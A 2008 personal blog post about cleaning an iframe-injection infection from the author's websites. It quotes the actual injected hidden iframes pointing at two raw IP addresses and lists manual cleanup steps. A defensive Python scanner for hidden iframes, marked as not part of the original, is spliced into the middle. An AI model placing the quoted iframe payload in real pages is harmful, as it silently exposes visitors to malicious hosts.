Wednesday, November 26, 2008

How did I remove the iFrame injection from my sites?

I don't know how I got this 'iFrame injection' on my websites. I noticed it for the first time a few months ago, when my web host shut down my service momentarily. The reason was that one of the folders on my hosting space contained a chunk of malware and bad scripts. On checking, it was Ashish's folder, and I saw him deleting all the suspicious files after I informed him. Later he told me that his sites were infected as well as mine. I noticed that every website I owned had this iframe injection, which looked similar to this:

<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

The ill effects of this script, to my understanding, are as follows:
- steals your traffic (even if you have high traffic, search engines might consider you an idle site)
- steals your customers' information on dynamic websites if they are infected.
- redirects visitors to malicious sites in the worst cases.
- extremely slow page loads.
- search engines might block your website from ever being listed in their directories
- and more...

This code was injected into every main page of my websites. I called my web host back and they told me they were fighting this issue even more than I was. They said the only resolution was to nuke the entire account, including databases, folders, etc., and recreate everything. I didn't agree: "You wouldn't kill a person in the name of curing his disease."

After searching for a while and talking to a so-called PHP guru, I tried register_globals = Off in php.ini so as to stop the PHP code from executing automatically. But that in turn shut down some of my sites, which were inoperable without register_globals = On.

I manually deleted the remnants of that script as far as I could. For some time I thought it had gone away, but deep down I was sure I hadn't removed them all. A few weeks later, it was Hem's message that confirmed my site was still infected. He wrote that my personal blog was blacklisted in Google Chrome as a possibly malicious site. I checked my other blog too; it was also blocked by Google Chrome. Now that was alarming. It looked something like this:

I was upset because I couldn't find the time to resolve this issue; I was busier than I thought. After a month or so, I took the time and sat down in front of my computer to fight this problem. When I searched online for this particular issue, nobody had any solid solution, only high-tech ramblings and nothing else. I found my own simple way to remove this iFrame hack problem.

The following steps show how I removed the iFrame injection from my websites:

1. First off, change all the passwords of your hosting accounts, including the blogs' admin passwords and so on. I used https://www.grc.com/passwords.htm to generate hack-proof passwords, took a chunk out of the output, and saved it somewhere else. From then on I just copied and pasted the passwords whenever needed; there is no need to type all those weird characters at all.

2. Some said the injection could have altered the databases and suggested I drop all of them. I didn't believe them. I went to my host's phpMyAdmin and ran a search query across the entire databases. My search term was 'iframe', along with other likely keywords. I didn't find any traces at all. You can skip this step 2 if you don't know how to do that.

3. Next, I downloaded and installed "Actual Search and Replace". This software searches for given phrases regardless of file type and modifies them as needed; just as its name suggests, search and replace.

4. Now the crucial part. FTP into your accounts and download all possibly infected files/folders from your host. Once you have downloaded them all and saved them somewhere on your hard drive, run 'Actual Search and Replace'. It is much, much more powerful than Windows Search or a built-in Find feature. As soon as you run the program, you'll know what to do next: enter 'iframe' as the phrase, point it at the location of the downloaded folders, and click 'FIND'. You'll see all the legitimate and illegitimate entries. Most of the infected files were:
index.htm
index.html
index.php
header.php
footer.php
and some with obnoxious file names...
Check all those suspicious files in your favorite HTML editor. Narrow your search in 'Actual Search and Replace'. Once confirmed, replace them all with nothing. Or, to be on the safe side, do what I did: I edited them all one by one in Dreamweaver and deleted the injected code manually, so as not to remove the legitimate iframe code from my HTML/PHP files. After I was done (it took more than 4 hours), I re-uploaded all of them to where they were before.
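As an added example (not part of the original post and not the Actual Search and Replace tool), a small Python script that does the same triage over a downloaded copy of a site: it lists every iframe a visitor cannot see (zero-sized, or hidden by its style, like the injected tags quoted above) with its line number, and strips only those, leaving visible, legitimate iframes in place. The sample page, the documentation-range IP addresses in it and the .htm/.html/.php file filter are constructed for this example.

```python
import re
from pathlib import Path

# Constructed sample page (not from the post): one legitimate, visible iframe plus two
# zero-size hidden iframes shaped like the quoted injection, using documentation IPs.
SAMPLE_PAGE = """<html><body>
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ" width="560" height="315"></iframe>
<iframe src="http://203.0.113.10/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.0.113.11/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def attrs(opening_tag: str) -> dict:
    """Parse attribute=value pairs (quoted or bare, as in width=0) from an opening tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(opening_tag)}

def is_hidden_iframe(tag: str) -> bool:
    """True for a frame the visitor cannot see: zero-sized, or hidden via its style."""
    a = attrs(tag.split(">", 1)[0])
    zero_size = a.get("width", "").rstrip("px") == "0" and a.get("height", "").rstrip("px") == "0"
    style = a.get("style", "").replace(" ", "").lower()
    # style="hidden" is the malformed value the injected tags carry; the other two are real CSS
    return zero_size or style == "hidden" or "display:none" in style or "visibility:hidden" in style

def find_hidden_iframes(html: str) -> list:
    """Return (line_number, tag) for each hidden iframe so it can be reviewed before removal."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        if is_hidden_iframe(m.group(0)):
            hits.append((html.count("\n", 0, m.start()) + 1, m.group(0)))
    return hits

def clean_html(html: str) -> str:
    """Strip hidden iframes only; visible iframes such as embedded video are kept."""
    return IFRAME_RE.sub(lambda m: "" if is_hidden_iframe(m.group(0)) else m.group(0), html)

def scan_tree(root: Path, write: bool = False) -> dict:
    """Scan .htm/.html/.php files under a downloaded site copy; clean in place if write=True."""
    report = {}
    for path in root.rglob("*"):
        if path.suffix.lower() in {".htm", ".html", ".php"}:
            text = path.read_text(encoding="utf-8", errors="replace")
            if hits := find_hidden_iframes(text):
                report[str(path)] = hits
                if write:
                    path.write_text(clean_html(text), encoding="utf-8")
    return report
```

Run scan_tree(Path("site_copy")) first to get the report, review the listed tags by hand, and only then rerun with write=True on the local copy before re-uploading.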

After that, I didn't see the iFrame injection coming back when I refreshed my pages. Press Ctrl+F5 for a fresh reload of your web pages. This method of removing the malware is safe and solid; it removed the iFrame injection from my websites. I'm confident because it's now Day 29 after the successful removal of this iframe injection.

I didn't see this solution anywhere on the Internet. All the PHP gurus and experts suggested deleting the entire system setup, which I don't think is reasonable enough.

Note: On a little research, I found this hack originated from some part of Russia, but it was script kiddies from Malaysia who seemed to be using it on my servers. Many big corporate sites seemed to be affected by this problem, and God knows how much those security experts might have charged them in the name of remedying it.

Thank you for reading my post.

3 comments:

Ashish said...

Yeah I remember this iframe attack. Those iframes made our pages never finish loading.

Nurse Jen Doll said...

I never knew all this. Nice info. I hate viruses.

-Nurse Jen Doll
www.nursejendoll.com
Your Daily Reality Nursing

Navin said...

Ashish, you are right. It has many ill-effects other than slow-loading.

Nurse Jen, you are the nurse, you know how to kill viruses.. give us some tips ;)
